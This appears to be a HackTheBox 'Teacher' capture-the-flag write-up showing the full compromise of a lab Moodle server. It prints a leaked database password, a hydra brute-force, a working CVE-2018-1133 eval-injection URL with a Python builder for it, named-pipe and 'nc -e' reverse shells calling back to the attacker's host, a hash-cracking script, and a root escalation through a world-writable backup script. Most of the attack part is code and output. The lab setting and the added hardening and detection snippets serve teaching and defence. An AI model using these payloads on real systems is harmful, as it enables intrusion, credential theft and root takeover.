title: HackTheBox-Teacher
author: Crazyinside
layout: true
categories: HackTheBox
tags:
- Linux
First, a fix for a problem that has probably bothered many colleagues for a long time without a solution; I only learned the trick recently from a fellow practitioner. Add one line with your own proxy address to every VPN file you download:
socks-proxy 127.0.0.1 7890
This is OpenVPN's socks-proxy directive: it sends the VPN connection through a local SOCKS5 listener (7890 is the common Clash default; use whatever port your proxy listens on). The network situation improves noticeably.
I abandoned Windows a long time ago and by now count as a standard Linux user. Recording box write-ups serves several purposes: it keeps my hands in practice, fills the empty space on the blog, goes with my study plan, and builds up documentation-writing skills along the way. After some time on Linux it really is a pleasure.
Although latency on this link still fluctuates a little, the environment is stable overall:
Crazy:~/HackTheBox$ ping 10.10.10.153
PING 10.10.10.153 (10.10.10.153) 56(84) bytes of data.
64 bytes from 10.10.10.153: icmp_seq=1 ttl=63 time=103 ms
64 bytes from 10.10.10.153: icmp_seq=2 ttl=63 time=149 ms
64 bytes from 10.10.10.153: icmp_seq=3 ttl=63 time=272 ms
64 bytes from 10.10.10.153: icmp_seq=4 ttl=63 time=99.1 ms
64 bytes from 10.10.10.153: icmp_seq=5 ttl=63 time=114 ms
64 bytes from 10.10.10.153: icmp_seq=6 ttl=63 time=99.4 ms
64 bytes from 10.10.10.153: icmp_seq=7 ttl=63 time=96.3 ms
A full-port masscan sweep is feasible now, and far fewer ports get missed:
Crazy:~/Teacher$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.153
[sudo] password for crazyinside:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-21 11:17:16 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.153
The default page is a very fake-looking one; most of its buttons do nothing. The basic information is unremarkable too:
Crazy:~/HackTheBox$ curl -I http://teacher.htb/
HTTP/1.1 200 OK
Date: Sun, 21 Aug 2022 11:35:10 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 27 Jun 2018 02:53:22 GMT
ETag: "1f5c-56f96b7bed26f"
Accept-Ranges: bytes
Content-Length: 8028
Vary: Accept-Encoding
Content-Type: text/html
Then I tried a new tool, skipfish, to enumerate directories. Part way through, once it seemed to have crawled enough, I stopped it with Ctrl-C; the tool renders its results as an HTML report.
It had classified an image, 5.png, as text. Interesting, and the image itself cannot be displayed,
so it is probably a txt file to begin with:
Crazy:~/HackTheBox$ wget http://teacher.htb/images/5.png
--2022-08-21 19:45:49--  http://teacher.htb/images/5.png
Resolving teacher.htb (teacher.htb)... 10.10.10.153
Connecting to teacher.htb (teacher.htb)|10.10.10.153|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 200 [image/png]
Saving to: '5.png.1'
5.png.1 100%[===================================================================================================================================================================>] 200 --.-KB/s in 0s
2022-08-21 19:45:49 (12.6 MB/s) - '5.png.1' saved [200/200]
Crazy:~/HackTheBox$ cat 5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
So the "image" is 200 bytes of plain text served with an image/png Content-Type. It gives a username, Giovanni, and a password with its last character missing: Th4C00lTheacha. Next to it there is a moodle directory, evidently the box's theme.
Directory listing is enabled under that path and exposes files, among them an editor backup of the Moodle config, which holds the database credentials:
Crazy:~/HackTheBox$ curl http://teacher.htb/moodle/config.php.save
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle'; // CHANGE THIS - Gi$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
The login form can be brute-forced against the username Giovanni, because he says himself he only forgot the last character of Th4C00lTheacha. The candidates are quick to generate with python (Burp Intruder would do as well); note the "\n" join, since hydra wants one candidate per line:
python3 -c 'import string;print("\n".join([f"Th4C00lTheacha{c}" for c in string.printable[:-5]]))' > passwords
Crazy:~/HackTheBox$ hydra -l Giovanni -P passwords 10.10.10.153 http-post-form "/moodle/login/index.php:anchor=&username=^USER^&password=^PASS^&rememberusername=1:Invalid login"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-21 19:56:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking http-post-form://10.10.10.153:80/moodle/login/index.php:anchor=&username=^USER^&password=^PASS^&rememberusername=1:Invalid login
[80][http-post-form] host: 10.10.10.153 login: Giovanni password: Th4C00lTheacha#
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-21 19:56:38
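The candidate generation and the success test hydra applied above, as an added example that is not part of the original write-up. It generalises the one-liner to more than one unknown trailing character and reproduces hydra's http-post-form rule (the string after the last colon is the failure marker, so any response without "Invalid login" counts as a hit). The sample responses at the bottom are constructed for illustration, not captured from the box.

```python
import itertools
import string

# Same alphabet as the one-liner above: string.printable minus its five
# trailing whitespace characters (\t \n \r \x0b \x0c), i.e. 95 symbols.
CHARSET = string.printable[:-5]


def candidates(prefix, missing=1, charset=CHARSET):
    """Yield prefix followed by every combination of `missing` characters.

    One unknown character is 95 guesses, two are 95**2 = 9025 (still fine for
    an online attack without lockout); three are ~857k and call for an
    offline attack instead.
    """
    for tail in itertools.product(charset, repeat=missing):
        yield prefix + "".join(tail)


def write_wordlist(path, prefix, missing=1):
    """Write candidates one per line (the format hydra -P reads); return the count."""
    n = 0
    with open(path, "w", encoding="utf-8") as fh:
        for pw in candidates(prefix, missing):
            fh.write(pw + "\n")
            n += 1
    return n


# Moodle prints this in the body of a failed login. hydra's http-post-form
# module treats the string after the last ':' as the FAILURE condition, so
# every response that lacks it is reported as a valid password; that is how a
# single real hit can turn into "16 valid passwords found" in the summary.
FAILURE_MARKER = "Invalid login"


def hydra_verdict(body):
    """What hydra concludes from one response body under the rule above."""
    return "invalid" if FAILURE_MARKER in body else "valid"


def strict_verdict(status, body, location=""):
    """A less forgiving check for confirming a hit by hand: a real Moodle
    login answers with a redirect away from login/index.php, never with the
    failure marker; anything else (error page, throttling) stays unknown."""
    if FAILURE_MARKER in body:
        return "invalid"
    if status in (302, 303) and "login/index.php" not in location:
        return "valid"
    return "unknown"


# Constructed sample responses (status, body, Location header).
SAMPLE_FAIL = (200, '<div class="loginerrors">Invalid login, please try again</div>', "")
SAMPLE_OK = (303, "", "http://10.10.10.153/moodle/")
SAMPLE_THROTTLED = (503, "<h1>Service Unavailable</h1>", "")
```

hydra_verdict marks the throttled response as "valid", which is exactly the false positive the summary line reflects; strict_verdict leaves it as "unknown" for a manual retry.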
Hydra's closing summary says "16 valid passwords found", but it printed only one hit. Its http-post-form module counts any response that lacks the failure string "Invalid login" as a success, so a hiccup (throttling, an error page) inflates that total; confirm the one real credential, Th4C00lTheacha#, by logging in by hand. This web app does have an RCE vulnerability; exploiting it is not hard, finding it is:
http://teacher.htb/moodle/question/question.php?courseid=2&sesskey=DOqbmippKA&qtype=calculated&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&cmid=7&category=2&addonpage=0&appendqnumstring=addquestion
The vulnerable spot is here: CVE-2018-1133, where Moodle's calculated question type hands the answer formula to PHP eval(). I will not copy and paste the details; they are at:
https://blog.sonarsource.com/moodle-remote-code-execution/?redirect=rips
Because the backend evaluates that formula, the payload turns straight into a webshell, with the command supplied in the query parameter named 0:
http://teacher.htb/moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=7&wizardnow=datasetitems&cmid=7&0=ping%20-c%201%2010.10.16.3
Crazy:~/HackTheBox$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:06:48.989982 IP teacher.htb > 10.10.16.3: ICMP echo request, id 3291, seq 1, length 64
20:06:48.990014 IP 10.10.16.3 > teacher.htb: ICMP echo reply, id 3291, seq 1, length 64
20:06:49.088302 IP teacher.htb > 10.10.16.3: ICMP echo request, id 3293, seq 1, length 64
20:06:49.088321 IP 10.10.16.3 > teacher.htb: ICMP echo reply, id 3293, seq 1, length 64
URL-encode the reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 1337 >/tmp/f
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.16.3%201337%20%3E%2Ftmp%2Ff
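The encoding step above and the command-execution URL it is dropped into, as an added example (not the author's or Moodle's code). The hostname, the quiz and question ids (cmid=7, id=7) and the listener address are the ones that appear in this write-up and are placeholders for your own session; the exploit precondition (the malicious calculated question already created, as in the public CVE-2018-1133 payload that reads $_GET[0]) is assumed.

```python
from urllib.parse import quote, urlencode, urlsplit, parse_qs


def reverse_shell(lhost, lport, shell="sh"):
    """The named-pipe reverse shell used in the write-up."""
    return (f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1"
            f"|nc {lhost} {lport} >/tmp/f")


def encode_cmd(cmd):
    """Percent-encode every reserved character (space / ; | > &) so the whole
    shell command survives as one query-string value. safe='' matters:
    quote()'s default keeps '/' literal, which would break the path parts."""
    return quote(cmd, safe="")


def rce_url(base, cmd, cmid=7, qid=7):
    """Rebuild the request the write-up makes once the malicious question
    exists: the formula is evaluated when the datasetitems wizard step runs,
    and the injected expression takes the command from the parameter named 0.
    base is the Moodle root, e.g. http://teacher.htb/moodle (assumption)."""
    params = {
        "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
        "appendqnumstring": "addquestion",
        "scrollpos": "0",
        "id": str(qid),
        "wizardnow": "datasetitems",
        "cmid": str(cmid),
        "0": cmd,
    }
    # quote_via=quote gives %20 for spaces (the write-up's URLs), not '+'.
    return f"{base}/question/question.php?" + urlencode(params, quote_via=quote)


def command_from_url(url):
    """Defender's view: recover the injected command from a logged request
    line, e.g. when grepping Apache access logs for wizardnow=datasetitems."""
    return parse_qs(urlsplit(url).query).get("0", [""])[0]


if __name__ == "__main__":
    print(rce_url("http://teacher.htb/moodle", reverse_shell("10.10.16.3", 1337)))
```

A useful detection on the server side is any question.php request whose query string carries a parameter named 0 at all; legitimate Moodle forms never send one.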
Crazy:~/HackTheBox$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.153] 54248
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$ ls
ls
addquestion.php engine move_form.php toggleflag.php
behaviour export.php preview.php type
category.php export_form.php previewlib.php upgrade.php
category_class.php flags.js qengine.js upgrade.txt
category_form.php format question.php yui
classes format.php renderer.php
edit.php import.php templates
editlib.php import_form.php tests
www-data@teacher:/var/www/html/moodle/question$
We already have the leaked database password; the mdl_user table in the moodle database holds the other accounts:
MariaDB [moodle]> select username,password from mdl_user;
select username,password from mdl_user;
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
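Triage of the dumped hashes, as an added example that is not the author's or Moodle's code. The hashes are the ones in the table above; the wordlist is a small constructed one for illustration (a real run would use rockyou or a school-themed list), and the unsalted-MD5 assumption follows from the leaked config.php.save containing no passwordsaltmain setting.

```python
import hashlib
import re

BCRYPT_RE = re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Hashes exactly as dumped from mdl_user above.
DUMPED = {
    "guest": "$2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO",
    "admin": "$2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2",
    "giovanni": "$2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO",
    "Giovannibak": "7a860966115182402ed06375cf0a22af",
}

# Constructed wordlist for illustration only.
WORDS = ["password", "moodle", "teacher", "Welkom1!", "Th4C00lTheacha#",
         "expelled", "giovanni", "student"]


def classify(h):
    """'bcrypt' is what current Moodle writes via password_hash(); a bare
    32-hex value is the legacy MD5 format older Moodle versions stored and
    only upgrades when that user logs in again, so backup/stale accounts
    keep it forever."""
    if BCRYPT_RE.match(h):
        return "bcrypt"
    if MD5_RE.match(h):
        return "md5"
    return "unknown"


def crack_md5(target, words):
    """Unsalted MD5 dictionary attack. If the site had set
    $CFG->passwordsaltmain the hash would be md5(password + salt) instead;
    the leaked config.php.save has no such line, so unsalted is tried first."""
    target = target.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == target:
            return w
    return None


def triage(dumped, words):
    """Return {user: (kind, cracked_password_or_None)}. bcrypt entries are
    left for hashcat -m 3200 / john --format=bcrypt; only MD5 is tried here."""
    out = {}
    for user, h in dumped.items():
        kind = classify(h)
        cracked = crack_md5(h, words) if kind == "md5" else None
        out[user] = (kind, cracked)
    return out


if __name__ == "__main__":
    for user, (kind, cracked) in triage(DUMPED, WORDS).items():
        print(f"{user:12} {kind:7} {cracked or '-'}")
```

The point of the split is cost: the three bcrypt hashes at cost 10 are slow to attack, while the stale Giovannibak entry falls to a dictionary in milliseconds, and its cleartext is then worth trying everywhere else on the box.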
The last one is a 32-hex-digit legacy MD5 rather than bcrypt and can be cracked; the same password also works for the giovanni system account:
MariaDB [moodle]> exit
exit
Bye
www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle/question$ ls
ls
addquestion.php engine move_form.php toggleflag.php
behaviour export_form.php previewlib.php type
category_class.php export.php preview.php upgrade.php
category_form.php flags.js qengine.js upgrade.txt
category.php format question.php yui
classes format.php renderer.php
editlib.php import_form.php templates
edit.php import.php tests
giovanni@teacher:/var/www/html/moodle/question$ cd ~
cd ~
giovanni@teacher:~$ ls
ls
user.txt work
giovanni@teacher:~$ cat user.txt
cat user.txt
2ad1e90bef00ffafee595084962b4111
giovanni@teacher:~/work/tmp$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
giovanni@teacher:~/work/tmp$ ls -l /usr/bin/backup.sh
ls -l /usr/bin/backup.sh
-rwxrwxrwx 1 root root 138 Jun 27 2018 /usr/bin/backup.sh
giovanni@teacher:~/work/tmp$ ln -s /usr/bin/backup.sh
ln -s /usr/bin/backup.sh
giovanni@teacher:~/work/tmp$ ls
ls
backup_courses.tar.gz backup.sh courses
giovanni@teacher:~/work/tmp$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
giovanni@teacher:~/work/tmp$ ls -all
ls -all
total 16
drwxr-xr-x 3 giovanni giovanni 4096 Aug 21 14:19 .
drwxr-xr-x 4 giovanni giovanni 4096 Mar 21 15:29 ..
-rwxrwxrwx 1 root root 259 Aug 21 14:20 backup_courses.tar.gz
lrwxrwxrwx 1 giovanni giovanni 18 Aug 21 14:19 backup.sh -> /usr/bin/backup.sh
drwxrwxrwx 3 root root 4096 Mar 21 15:29 courses
giovanni@teacher:~/work/tmp$ echo "nc -e /bin/bash 10.10.16.3 443" >> /usr/bin/backup.sh
echo "nc -e /bin/bash 10.10.16.3 443" >> /usr/bin/backup.sh
giovanni@teacher:~/work/tmp$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
nc -e /bin/bash 10.10.16.3 443
giovanni@teacher:~/work/tmp$
Crazy:~/HackTheBox$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.153] 40502
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
8b1..............................
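The privilege escalation above rests on one misconfiguration: /usr/bin/backup.sh is owned by root, runs as root (the root shell proves a privileged job executes it), and is mode 777, so any user can append to it. (The script's unquoted courses/* wildcard in its tar call would be a second, well-known route; it was not needed here.) As an added example that is not the author's code, the audit a practitioner runs to find such files, plus the fix; the directory list and the fixture demo() builds are constructed for illustration.

```python
import os
import stat
import tempfile

# Directories where a root-run script or cron job is likely to live (assumption;
# extend with whatever the crontab and systemd timers on the box reference).
DEFAULT_DIRS = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/etc/cron.d",
                "/etc/cron.daily", "/etc/cron.hourly", "/opt")


def world_writable_files(dirs, only_uid=None):
    """Regular files under dirs with the o+w bit set (symlinks are not
    followed, so a link like the one created above is not itself a hit),
    optionally limited to files owned by only_uid (0 for root). Sorted paths."""
    hits = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for dirpath, _subdirs, filenames in os.walk(d):
            for name in filenames:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IWOTH:
                    continue
                if only_uid is not None and st.st_uid != only_uid:
                    continue
                hits.append(p)
    return sorted(hits)


def harden(path):
    """Drop group and other write, which backup.sh should never have had
    (0755 for a root-run script); return the new mode."""
    mode = stat.S_IMODE(os.stat(path).st_mode) & ~(stat.S_IWGRP | stat.S_IWOTH)
    os.chmod(path, mode)
    return mode


def demo():
    """Constructed fixture: one 0777 script (the bad case) and one 0755 script.
    Audit, harden the bad one, audit again; return what was observed."""
    base = tempfile.mkdtemp(prefix="audit-")
    bad = os.path.join(base, "backup.sh")
    good = os.path.join(base, "ok.sh")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\ncd /home/giovanni/work;\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    before = world_writable_files([base])
    new_mode = harden(bad)
    after = world_writable_files([base])
    return {"bad": bad, "before": before, "new_mode": new_mode, "after": after}


if __name__ == "__main__":
    print(demo())
    # On a real host: root-owned, world-writable files in the usual places.
    print(world_writable_files(DEFAULT_DIRS, only_uid=0))
```

Run it on the box as any user; the second print is the list an attacker would start from, and the only acceptable output on a healthy system is an empty one.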
Originally published on the WeChat official account 老鑫安全: HackTheBox-Teacher